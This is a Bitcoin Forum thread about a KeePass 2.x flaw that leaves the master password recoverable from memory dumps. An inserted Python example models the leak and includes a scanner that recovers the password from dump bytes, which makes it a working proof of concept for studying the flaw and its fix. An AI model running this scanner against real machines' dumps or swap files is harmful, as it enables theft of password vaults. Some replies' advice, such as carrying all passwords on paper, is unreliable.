Bitcoin Forum
Topic: KeePass vulnerability: Recover master pwd in clear text from memory dump
libert19 (OP), May 27, 2023, 09:45:42 AM, #1
Last edit: June 10, 2023, 08:38:48 AM by libert19
Merited by ABCbits (1), TryNinja (1)

If you use KeePass, remember to upgrade it to version 2.54 as soon as it becomes available. This vulnerability affects KeePass 2.x (users of KeePassXC/Strongbox/KeePass 1.x are unaffected).

Quote
In KeePass 2.x before 2.54, it is possible to recover the clear text master password from a memory dump, even when a workspace is locked or no longer running. The memory dump can be a KeePass process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or RAM dump of the entire system. The first character cannot be recovered. In 2.54, there is different API usage and/or random string insertion for mitigation.

Source: CVE




Thread where this vulnerability was exposed: Sourceforge



This is a PSA thread. I don't understand the technical jargon mentioned on the above sites.

___

Edit: KeePass 2.54 released: Download






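To make the CVE text above concrete, here is an added example; it is not part of the original post and not KeePass's own code. It models the publicly documented cause of the leak: the 2.x password box builds, for every keystroke, a string of bullets (one per already-typed character) followed by the newly typed character, and those intermediate .NET strings stay in the heap, so a process dump, pagefile.sys, hiberfil.sys or full RAM image still contains them. The scanner recovers everything but the first character, exactly as the CVE text says. The "2.54-style" side only models the "random string insertion" wording from the CVE text (the real fix also changed API usage, which is not reproduced); the dump, the test password `Tr0ub4dor&3`, the decoy count and the function names are all constructed for the example.

```python
"""Added example (not from the thread, not KeePass code): a model of the
KeePass 2.x (pre-2.54) master-password leak, a scanner that recovers the
password from a simulated memory dump, and a model of why 2.54-style random
string insertion defeats that scanner. The dump is constructed here; nothing
parses a real process dump, pagefile.sys or hiberfil.sys."""
import random
import re

BULLET = "\u2022"   # masking character the 2.x password box shows per typed char

# UTF-16LE (how .NET stores strings): one or more bullets (22 20) followed by
# exactly one code unit that is not itself a bullet.
LEAK_RE = re.compile(rb"(?:\x22\x20)+(?!\x22\x20)([\x00-\xff]{2})")


def leaked_strings_vulnerable(password: str) -> list[str]:
    """Leftover strings of the pre-2.54 box: after the n-th keystroke the
    control builds (n-1) bullets plus the new character as an immutable .NET
    string that lingers in the heap, so a later dump still holds it. The first
    character has no bullet in front of it, which is why it is never recovered."""
    return [BULLET * i + ch for i, ch in enumerate(password)]


def leaked_strings_mitigated(password: str, rng: random.Random, decoys: int = 3) -> list[str]:
    """Simplified model of the 'random string insertion' named in the CVE text
    (assumption: the real 2.54 control also changed API usage, not modelled).
    Every genuine intermediate string is accompanied by decoy strings of the
    same shape but with a different final character."""
    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    out = []
    for i, ch in enumerate(password):
        out.append(BULLET * i + ch)
        others = alphabet.replace(ch, "")
        out.extend(BULLET * i + rng.choice(others) for _ in range(decoys))
    return out


def build_dump(strings: list[str], rng: random.Random, filler: int = 4096) -> bytes:
    """Constructed stand-in for a RAM dump: the strings in UTF-16LE at unrelated
    offsets among junk bytes. The junk never contains 0x20/0x22, so this demo has
    no false positives; a real dump has some, and the analyst discards them."""
    safe = bytes(b for b in range(256) if b not in (0x20, 0x22))
    order = list(strings)
    rng.shuffle(order)                         # heap order != typing order
    parts = [bytes(rng.choice(safe) for _ in range(filler))]
    for s in order:
        parts.append(s.encode("utf-16-le"))
        parts.append(bytes(rng.choice(safe) for _ in range(rng.randrange(8, 128))))
    return b"".join(parts)


def recover_candidates(dump: bytes) -> dict[int, set[str]]:
    """Scan a dump for the leak pattern. Key k = number of bullets = 0-based
    position of the character that followed them; position 0 never occurs."""
    cands: dict[int, set[str]] = {}
    for m in LEAK_RE.finditer(dump):
        n_bullets = (m.start(1) - m.start()) // 2
        ch = m.group(1).decode("utf-16-le", errors="ignore")
        if ch:
            cands.setdefault(n_bullets, set()).add(ch)
    return cands


def reconstruct(cands: dict[int, set[str]]) -> str:
    """'?' for the unrecoverable first character, the character where exactly
    one candidate was seen, {a|b|c} where the dump is ambiguous, '_' if none."""
    if not cands:
        return ""
    out = ["?"]
    for k in range(1, max(cands) + 1):
        found = sorted(cands.get(k, ()))
        out.append(found[0] if len(found) == 1
                   else "{" + "|".join(found) + "}" if found else "_")
    return "".join(out)


def search_space(cands: dict[int, set[str]]) -> int:
    """How many password tails (positions 1..n) are consistent with the dump."""
    n = 1
    for k in range(1, max(cands, default=0) + 1):
        n *= max(1, len(cands.get(k, ())))
    return n


def simulate(password: str, mitigated: bool, seed: int = 7) -> dict[int, set[str]]:
    """Type `password` into the modelled box, dump memory, run the scanner."""
    rng = random.Random(seed)
    strings = (leaked_strings_mitigated(password, rng) if mitigated
               else leaked_strings_vulnerable(password))
    return recover_candidates(build_dump(strings, rng))


if __name__ == "__main__":
    for label, flag in (("pre-2.54", False), ("2.54-style", True)):
        c = simulate("Tr0ub4dor&3", mitigated=flag)   # constructed test password
        print(f"{label:10s} {reconstruct(c)}  ({search_space(c)} candidate tail(s))")
```

Against the pre-2.54 model the scanner prints `?r0ub4dor&3` with a single consistent tail; against the decoy model every position after the first has several candidates, so the attacker is back to guessing. The same scan applies to any byte buffer, which is why the CVE text lists pagefile.sys and hiberfil.sys alongside a process dump: the practical defences are upgrading so the pattern is no longer produced, and full-disk encryption so a stolen disk does not hand over those files in the clear.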
Lamkuthang, May 27, 2023, 10:19:22 AM, #2

Yes, that's right, OP. There was a vulnerability in KeyPass versions 2.x prior to 2.54 which could compromise the security of the user's master password, and it is imperative that KeyPass users upgrade to version 2.54 as soon as it is available to ensure the safety of their sensitive data.

BitMaxz, May 27, 2023, 10:58:55 AM, #3

I don't think it's a good idea to use software or a password manager with a vulnerability issue, just like before when someone's password was compromised. All of his coins were withdrawn, and he also used a password manager. So it's not safe to use any password manager; if you want to use a password manager, then only use it if there is no money involved on that site. For example, for Twitter and Facebook accounts I use the password manager from Chrome, only for social media accounts and sites that have no money involved.

So upgrading to the latest version wouldn't help to save your compromised password; it would be better to use a piece of paper to write all of your passwords on and put it in your wallet (that's the offline way and safer than a password manager/PC that is still connected to the internet).

348Judah, May 27, 2023, 11:17:10 AM, #4

Quote from: libert19
If you use KeePass, remember to upgrade it to version 2.54 as soon as it becomes available. This vulnerability affects KeePass 2.x (users of KeePassXC/Strongbox/KeePass 1.x are unaffected).

This is not the best option to take as a means of storing your keys, since it is software developed by some set of people you can't say much about. I believe there are many other means one can use to secure his seeds or keys, for example washers, plated metallic sheets, laminated paper or any other offline means that can keep our wallet keys safe. Not only this, we can always avoid a third party having access to them, and always ensure that the computer system you're using is not always connected to the internet, which means your wallet has to be on an airgapped device.

Zaguru12, May 27, 2023, 12:15:26 PM, #5

Quote from: 348Judah
This is not the best option to take as a means of storing your keys, since it is software developed by some set of people you can't say much about. I believe there are many other means one can use to secure his seeds or keys, for example washers, plated metallic sheets, laminated paper or any other offline means that can keep our wallet keys safe. Not only this, we can always avoid a third party having access to them, and always ensure that the computer system you're using is not always connected to the internet, which means your wallet has to be on an airgapped device.

Although I don't recommend saving passwords online, not just because of the vulnerability to attacks but also because this makes one rely on them totally and can cause one to forget the password totally. But when it comes to password managers, I think KeePassXC is one of the ones highly recommended by the forum community. It is open source, and the seeds or passwords generated can be stored in encrypted form where only you can access them.

TryNinja, May 27, 2023, 07:54:03 PM, #6

Important thing to mention, from the SourceForge discussion:

Quote
An attacker needs read access to your filesystem or your RAM. Realistically, if your computer is infected by malware that's running in the background, this doesn't make it much worse - for that you could already be attacked by e.g. KeeFarce etc. (and there's no protection against that without specialized HW).

Unless you expect to be specifically targeted by someone sophisticated, I would keep calm. The issue here could be, say, someone stealing your computer and taking the HDD out. It's not entirely unrealistic, after all that's what the police will try to do in a raid. You can find several companies developing special forensic software for these kinds of scenarios. But it's really not what most people should panic about. If you use full disk encryption with a strong password, it gets even more unlikely.

This finding alone doesn't allow anyone to steal your passwords remotely over the internet.

So not as troublesome as it sounds (still a big problem, of course).

Husires, May 28, 2023, 09:23:00 AM, #7

It is a kind of physical attack or RAM access, but it is unfortunate to see what happened with an open source program. It is better to keep the passwords encrypted in a password manager, so even if the hackers gain access to the password management program, they still need to access the private key for decryption, which you can keep in an offline environment.

Thanks for the warning, and it is better not to trust the defaults in open source software.

TryNinja, May 28, 2023, 01:08:03 PM, #8

2.54 is not out yet.

Quote from: Dominik (KeePass developer)
To clarify, "within the next two months" was meant as an upper bound. The other features that I'm currently working on (which are also related to security and which I don't want to postpone) are almost finished; a realistic estimate for the KeePass 2.54 release probably is "in the beginning of June" (i.e. 2-3 weeks), but I cannot guarantee that.

Best regards,
Dominik

But if anyone is worried, there is a development snapshot with corrections: https://keepass.info/filepool/KeePass_230507.zip

Of course, you should verify the link through the developer's own comment on SourceForge: https://sourceforge.net/p/keepass/discussion/329220/thread/f3438e6283/?limit=25#0829

FYI: It's KeePass, not KeyPass.

libert19 (OP), June 10, 2023, 08:31:14 AM, #9

Bump! KeePass 2.54 released.
